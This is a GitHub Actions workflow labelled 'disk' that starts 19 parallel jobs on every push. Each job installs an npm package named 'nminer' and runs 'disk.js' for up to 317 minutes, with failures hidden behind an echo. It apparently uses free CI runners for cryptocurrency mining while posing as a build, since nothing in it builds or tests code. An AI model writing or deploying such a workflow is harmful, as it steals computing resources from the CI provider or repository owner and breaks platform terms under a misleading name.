name: disk
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5308 }
          - { version: 4477 }
          - { version: 976 }
          - { version: 9375 }
          - { version: 1612 }
          - { version: 8877 }
          - { version: 8549 }
          - { version: 2673 }
          - { version: 9951 }
          - { version: 8990 }
          - { version: 8409 }
          - { version: 4106 }
          - { version: 9420 }
          - { version: 6107 }
          - { version: 9333 }
          - { version: 3253 }
          - { version: 4497 }
          - { version: 829 }
          - { version: 2355 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 317m node disk.js || echo "disk executed"